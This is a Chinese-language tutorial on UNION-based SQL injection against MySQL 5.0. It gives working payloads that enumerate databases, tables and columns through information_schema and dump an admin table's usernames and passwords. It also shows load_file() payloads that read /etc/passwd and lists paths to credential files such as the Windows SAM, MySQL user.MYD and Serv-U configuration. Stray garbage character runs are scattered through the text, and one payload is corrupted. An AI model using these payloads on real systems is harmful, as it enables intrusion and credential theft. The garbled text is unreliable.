mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。



Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
- j/ g7 v5 C$ n9 H% h存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
1.得到所有数据库名：
; g8 X/ ~! U8 n# @5 `|SCHEMATA ->存储数据库名的表
|—字段：SCHEMA_NAME ->数据库名称

3 Z& H, Y; E" Q! [# V|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
8 M5 X3 Y) n: Q5 t1 E|—字段：TABLE_NAME ->存储表的表名

$ a9 h# F& j# v* C6 x; x|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
1 U1 C% }! l7 M0 ?- i|—字段：TABLE_NAME ->存储所属表的名称
  o- f+ A; o" w# H( X
4 D3 Z, B4 e6 e, K% }' A5 P3 Z8 V|—字段：COLUMN_NAME ->该字段的名称

#########################################################################
##

0×001 获取系统信息:
/ o5 ]; P' E" ~# ?+ b7 ?
) q/ m/ @$ U, p1 @union select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
9 o( [" }7 A5 g& E7 S% K  W6 Q& U(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
' @. Y* u' C5 Y4 s2 a. c9 g* E
/*

* i" m2 H9 i! l' O- R3 s' e: O@@global.version_compile_os 获取系统版本
4 ~# o5 E, @/ c
@@datadir 数据库路径
+ M. {: X* j( R# odatabase() 当前数据库名称
0x3c62723e 换行HEX值

*/

######################################################################

0×002 获取表名

union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
3 v( p, I9 s. @1 o6 f; Yinformation_schema.tables where table_schema=0x67617264656e /*
: q7 ^/ K" \" [8 l2 M: _5 I# p2 w6 }
+ z' T& A' a, l$ Y/*
* w8 _, b& h& \0 I  [' r, u5 Q
1 z* _- Z5 P' h$ ~$ E. {) ]0x67617264656e 为当前数据库名
  r! E7 U& \+ ~
9 {0 s) u* v1 n/ C% ~+ S6 R4 F, cgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名

*/
( J$ t, g4 Q- H- `5 N+ Y' `
) c7 k% c- t. K0 F  x; `######################################################################
1 ]! z* g  ?+ G8 ~' u: h" V  [
9 h) a/ }, |8 U! R  L0×003 获取字段
' R. m+ \- v& w9 z9 b1 ~3 C/ I- M
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and
6 u8 J3 T) T3 {3 u9 e8 g- i

table_schema=0x67617264656e limit 1 /*
; }, V  _( Z7 H* _3 M9 A
/*
: m$ e6 k/ }3 r8 k; Y' s
. A) X9 k6 z) R  ?' ^7 D2 kgroup_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

0x61646d696e ->选择一个表
3 [9 ]& y" w4 O- b4 u
0x67617264656e ->数据库名
/ U9 U/ F; p- {
*/
% j/ }! X" K' m% D( Z+ k7 {0 e
#####################################################################
; h/ M! n; I5 r* {6 k
0×004 获取数据
5 o; e/ B1 ]) a! |( g
3 X2 \, f  N1 k4 w2 x( A, }5 {union select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
1 `* g& T; R/ T; g5 }
' b" I2 m" y" [' A% n) N4 S: uunion select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin

/*
0 k( {5 {+ x! ~
' O& h6 W) M& g0 y( G0 ?0x3c62723e 换行符号HEX编码

+ o+ D; G) B* [" y* y" N) C/ Cgroup_concat 同时获得该字段所有数据
) ^& W. s0 g  X0 ?
, {( `5 G7 K4 ^( Q*/
  w9 w& a0 z- o5 N& ^$ Q5 C" q! I7 J
6 k) q0 \& `* A( q- e! V% N9 M
# ?5 u7 q  x5 X) I; k1 O5 q  J
5 U, c' @' o6 [8 O  v* |& y3 A
& X9 x; k3 _7 r, Z' L
! c; C: i  n! i1 a& d1 ~顺便添加一些mysql注入时非常有用的一些东西
' {# ?* e, y, X8 q
; I5 x* W6 Y# Z; J简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

: M  |7 _. ^+ a' d/ i7 a1:system_user() 系统用户名
1 `! k3 R: {6 H2:user()        用户名
3:current_user()  当前用户名
, K/ J5 m$ W' B6 |% z9 c4:session_user()连接数据库的用户名
% l( h/ Y2 q! s: a9 s1 ^5:database()    数据库名
6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
8@datadir     读取数据库路径
: h. l( x! Q6 `3 B" R& }9@basedir    MYSQL 安装路径
10@version_compile_os   操作系统  Windows Server 2003,
9 ^7 _: V; `, e, r9 o1 ~收集的一些路径：
WINDOWS下:
! ?+ l) k! ^3 E6 L  ~4 uc:/boot.ini          //查看系统版本
9 M6 t3 X- T0 d% x9 zc:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
! `. l, X7 G# H! R7 x7 sc:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
: V  u. |9 o2 P3 b; OC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
# c. J! x: v% f& X' R& V( {//存储了pcAnywhere的登陆密码
/ \- @# k* e* ~+ b% y2 xc:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
$ I2 \; A: x9 U0 ]0 W2 yc:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
. z7 H" `/ j) V% Q8 @4 C) n
% U$ h1 M8 d4 l) \2 k
1 q/ f$ H5 ^( i' d( K! Jc:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
, }# {1 X2 z1 H% P0 td:\APACHE\Apache2\conf\httpd.conf
4 O! }! F6 X# N* q" zC:\Program Files\mysql\my.ini
' x3 x* l: y3 B2 d' g# Fc:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
. y  ?- h) V" X7 M
* u- J: z' K  u8 [1 ]/ \4 CLUNIX/UNIX下:
/ i2 J; l: y3 b6 j+ z/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
# g1 |  G- b9 m3 X/ ^, @/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
3 h( L$ I; ^( H, U5 d9 v( P/usr/local/app/php5/lib/php.ini //PHP相关设置
  X* e" l* K& H) o1 Q2 P5 G$ B/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
& j( z3 W; W: w' d7 d" Z/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
$ H0 ]' _2 L5 J0 c# h1 w" B5 l& d/etc/redhat-release //系统版本
  e+ ^3 _6 _6 m4 A1 b/etc/issue
5 ^1 p: U4 X0 d& Q/ E$ Z/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
: G, f1 L! Z+ B/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
* H9 o* I; Q" |: Z/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
! a( ?' H$ T: x; i! U/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
, \0 i, n3 g9 `0 Y9 o- l, |/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
9 @* s. V9 R) n4 F8 G- j- ^/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
8 f7 V1 E  [- a4 q' X上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

  ~  |4 Y) ?! `! {/ o, q; t9 N